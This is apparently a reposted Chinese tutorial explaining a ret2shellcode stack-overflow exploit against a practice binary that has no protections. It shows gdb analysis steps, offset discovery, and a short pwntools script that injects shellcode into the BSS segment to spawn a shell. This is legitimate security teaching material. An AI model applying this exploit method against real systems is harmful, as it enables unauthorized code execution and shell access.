本文視頻：
???????? 如果文字過(guò)于枯燥，可觀看在線(xiàn)視頻：https://edu.51cto.com/sd/16514

專(zhuān)注于為中小企業(yè)提供成都網(wǎng)站建設(shè)、成都網(wǎng)站制作服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)松桃免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都，凝聚了一批互聯(lián)網(wǎng)行業(yè)人才，有力地推動(dòng)了上千多家企業(yè)的穩(wěn)健成長(zhǎng)，幫助中小企業(yè)通過(guò)網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

基礎(chǔ)知識(shí)：

??????? ret2shellcode，即控制程序執(zhí)行 shellcode 代碼。shellcode 指的是用于完成某個(gè)功能的匯編代碼，常見(jiàn)的功能主要是獲取目標(biāo)系統(tǒng)的 shell。一般來(lái)說(shuō)，shellcode 需要我們自己填充。這其實(shí)是另外一種典型的利用方法，即此時(shí)我們需要自己去填充一些可執(zhí)行的代碼。

在棧溢出的基礎(chǔ)上，要想執(zhí)行 shellcode，需要對(duì)應(yīng)的 binary 在運(yùn)行時(shí)，shellcode 所在的區(qū)域具有可執(zhí)行權(quán)限。

第一步：分析程序代碼

使用gdb ./ret2shellcode加載程序，在命令行中輸入checksec來(lái)查看啟用的保護(hù)

可以發(fā)現(xiàn)沒(méi)有啟用任何保護(hù)

我們使用disass main來(lái)看下main函數(shù)的匯編代碼

這里對(duì)strncpy函數(shù)做分析，strncpy的api為：char *strncpy(char *dest,char *src,int size_t);第一個(gè)參數(shù)是接收的變量，第二個(gè)是從那里復(fù)制，第三個(gè)是復(fù)制多少。經(jīng)過(guò)分析第一個(gè)參數(shù)就是[esp]，第二個(gè)參數(shù)是[esp+0x4]，第三個(gè)參數(shù)是[esp+0x8]，這樣我們知道最終要復(fù)制的內(nèi)容要放到[esp]中，而現(xiàn)在[esp]是0x804a080。

經(jīng)過(guò)分析發(fā)現(xiàn)調(diào)用了gets函數(shù)和strncpy函數(shù)，其中g(shù)ets函數(shù)存在溢出漏洞，但是該程序沒(méi)有使用system("/bin/sh")，我們可以嘗試讓程序跳轉(zhuǎn)到我們的shellcode中，也就是說(shuō)gets函數(shù)接收的不再是普通的字符串而是我們構(gòu)建好的shellcode。

我們看下0x804a080地址在哪里：

第一種方法：使用IDA

第二種方法：在gdb里運(yùn)行readelf，或者在linux的shell里運(yùn)行readelf -S xxx查看bss段位置

是一個(gè)BSS段，如果可以我們講shellcode放到bss段中，然后將函數(shù)的返回值改為0x804a080，現(xiàn)在還缺少一個(gè)條件，就是bss段0x804a080是否有執(zhí)行權(quán)限，我們斷點(diǎn)調(diào)試下：

執(zhí)行b main 進(jìn)行斷點(diǎn)

執(zhí)行r 運(yùn)行程序

執(zhí)行vmmap查看是否有執(zhí)行權(quán)限

0x804a080的區(qū)間是在標(biāo)紅的0x0804a000到0x0804b000，有x執(zhí)行權(quán)限

第二步：查找程序溢出的偏移量

重新執(zhí)行g(shù)db ./ret2shellcode命令加載程序

執(zhí)行pattern create 200創(chuàng)建字符串

執(zhí)行 r運(yùn)行

輸入剛才創(chuàng)建的字符串

得到0x41384141地址，我們使用pattern offset 0x41384141來(lái)查看偏移

然后可以想到溢出代碼：

from pwn import *

p = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())

buf2_addr = 0x804a080

p.sendline(shellcode.ljust(112,'a') + p32(buf2_addr))

p.interactive()

#####

shellcode.ljust(112,'a')這段代碼就是要講shellcode不足112長(zhǎng)度的地方用a來(lái)填充。

網(wǎng)頁(yè)題目：緩沖區(qū)溢出-基本ROP-ret2shellcode
鏈接分享：http://chinadenli.net/article26/ggpojg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站導(dǎo)航、網(wǎng)站設(shè)計(jì)、外貿(mào)網(wǎng)站建設(shè)、營(yíng)銷(xiāo)型網(wǎng)站建設(shè)、手機(jī)網(wǎng)站建設(shè)、搜索引擎優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)